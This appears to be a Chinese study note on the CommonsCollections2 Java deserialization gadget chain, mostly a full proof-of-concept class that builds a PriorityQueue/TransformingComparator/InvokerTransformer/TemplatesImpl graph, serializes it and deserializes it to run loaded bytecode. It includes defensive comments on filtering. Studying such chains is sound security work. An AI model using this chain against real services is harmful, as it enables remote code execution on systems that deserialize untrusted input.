CC2 和 CC4 很像，都是在调用 TemplatesImpl 的 newTransformer() 时执行代码。那么我们用 InvokerTransformer 去调用 templates 的 newTransformer() 就可以了，只需要把 templates 传进去。
CC2 的特点是没有使用 Transformer[]。在 Shiro 反序列化或者其他中间件的反序列化过程中，会重写类加载的方法，类加载的时候有时候对数组处理不好，然后就加载不到。
这里直接写poc
package ysoserial.ay;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.xalan.xsltc.trax.TemplatesImpl;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;
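/**
 * Proof-of-concept for the CommonsCollections2 (CC2) deserialization gadget chain,
 * kept here for study of how the chain is assembled and where the sink is.
 *
 * <p>Object graph as built below: a serialized {@link PriorityQueue} carries a
 * {@link TransformingComparator} whose transformer is swapped, via reflection, for
 * an {@link InvokerTransformer} that invokes {@code newTransformer()} on a
 * {@link TemplatesImpl}. The class bytes placed in {@code _bytecodes} are what
 * {@code TemplatesImpl} loads when that method runs. The listing does not use a
 * {@code Transformer[]} array, which the original author notes as the property
 * that distinguishes CC2.
 *
 * <p>Defensive notes: the sink is plain Java native deserialization of
 * attacker-supplied bytes ({@link ObjectInputStream#readObject()}). Applications
 * should not deserialize untrusted input at all, or must restrict it with an
 * {@link ObjectInputFilter} allow-list. A stream that pairs {@code PriorityQueue},
 * {@code TransformingComparator}, {@code InvokerTransformer} and
 * {@code TemplatesImpl} is a strong indicator of this chain.
 *
 * <p>Created 2023/3/11.
 *
 * @author aY
 */
public class TestCC2 {

    /** Compiled class whose bytes are loaded into {@code TemplatesImpl._bytecodes}. */
    private static final String PAYLOAD_CLASS_PATH = "D://tmp/Test1.class";

    /** File the serialized queue is written to and read back from. */
    private static final String SERIALIZED_FILE = "ser.bin";

    /**
     * Builds the gadget object graph, serializes it to {@value #SERIALIZED_FILE} and
     * immediately deserializes it again, which fires the chain in this JVM.
     *
     * @param args unused
     * @throws Exception on reflection, I/O or class-loading failure
     */
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = new TemplatesImpl();
        // Both fields are private and written reflectively.
        setPrivateField(templates, "_name", "aaa");
        byte[] code = Files.readAllBytes(Paths.get(PAYLOAD_CLASS_PATH));
        // This is the point where the executed code is supplied: the class in
        // _bytecodes is what newTransformer() ends up loading.
        setPrivateField(templates, "_bytecodes", new byte[][] {code});

        // Invokes templates.newTransformer() when the comparator transforms an element.
        InvokerTransformer<Object, Object> invoker =
                new InvokerTransformer<>("newTransformer", new Class[] {}, new Object[] {});

        // A ConstantTransformer is used while the queue is populated; presumably so
        // the add() calls below do not trigger the chain during construction.
        TransformingComparator<Object, Object> comparator =
                new TransformingComparator<>(new ConstantTransformer<>(1));
        PriorityQueue<Object> queue = new PriorityQueue<>(comparator);
        queue.add(templates);
        // Added twice in the original; presumably so a comparison happens on readObject().
        queue.add(templates);

        // Only now swap in the real transformer.
        setPrivateField(comparator, "transformer", invoker);

        serialize(queue);
        unserialize(SERIALIZED_FILE);
    }

    /**
     * Sets a private field of {@code target} by name via reflection.
     *
     * @param target object whose field is written
     * @param fieldName field name as declared on {@code target}'s class
     * @param value new value
     * @throws ReflectiveOperationException if the field is missing or cannot be set
     */
    private static void setPrivateField(Object target, String fieldName, Object value)
            throws ReflectiveOperationException {
        Field field = target.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(target, value);
    }

    /**
     * Serializes {@code object} to {@value #SERIALIZED_FILE} in the working directory.
     * try-with-resources guarantees the stream is flushed and closed.
     *
     * @param object graph to write
     * @throws IOException if the file cannot be written
     */
    public static void serialize(Object object) throws IOException {
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(SERIALIZED_FILE))) {
            oos.writeObject(object);
        }
    }

    /**
     * Deserializes the first object in {@code filename} with an unfiltered
     * {@link ObjectInputStream}. This is the sink: running it on attacker-controlled
     * bytes is what makes the chain fire. A hardened application sets an
     * {@link ObjectInputFilter} allow-list or avoids native deserialization entirely.
     *
     * @param filename file to read
     * @return the deserialized object
     * @throws IOException if the file cannot be read
     * @throws ClassNotFoundException if a class named in the stream cannot be resolved
     */
    public static Object unserialize(String filename) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename))) {
            return ois.readObject();
        }
    }
}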